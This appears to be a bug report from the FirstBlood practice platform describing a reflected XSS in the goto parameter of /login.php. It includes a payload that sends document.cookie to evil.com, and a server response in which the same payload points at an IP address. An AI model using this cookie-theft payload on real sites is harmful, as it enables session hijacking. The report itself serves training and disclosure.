FirstBlood-#523 — POST-based rXSS on login.php
This issue was discovered on FirstBlood v2
On 2021-10-26, 0x1452 Level 3 reported:
Hey!
I found another way to exploit the goto
parameter on the /login.php
endpoint.
It doesn't sanitize inputs with a javascript
schema at all. This allows an attacker to craft a link that will cause XSS after the victim logs in.
To reproduce this navigate to /login.php?goto=javascript:document.location='http://evil.com?c='%2bdocument.cookie
, then log in.
The application will now send a POST request to /login.php
that results in the following response:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Oct 2021 02:58:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: drps=d81c914cb56b895ec86505141; expires=Sun, 31-Oct-2021 02:58:33 GMT; Max-Age=432000; path=/
Content-Length: 115
<script>top.location.href="javascript:document.location='http://159.223.18.143:41328?c='+document.cookie";</script>
The attacker can now extract your session cookie from their server logs:

P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: javascript:document.location='http://evil.com?c='%2bdocument.cookie
FirstBlood ID: 39
Vulnerability Type: Reflective XSS
Our mistake: The parameter "goto" on login.php should of been "fixed" when redirecting to prevent XSS but due to an oversight from Sean and Karl, the new code did not make it into production. This has since updated since the event ended and you're recommended to re-try. It's related to bug
ID 26
because the idea was developers fixed *this* one (when redirecting) but forgot the other reflection.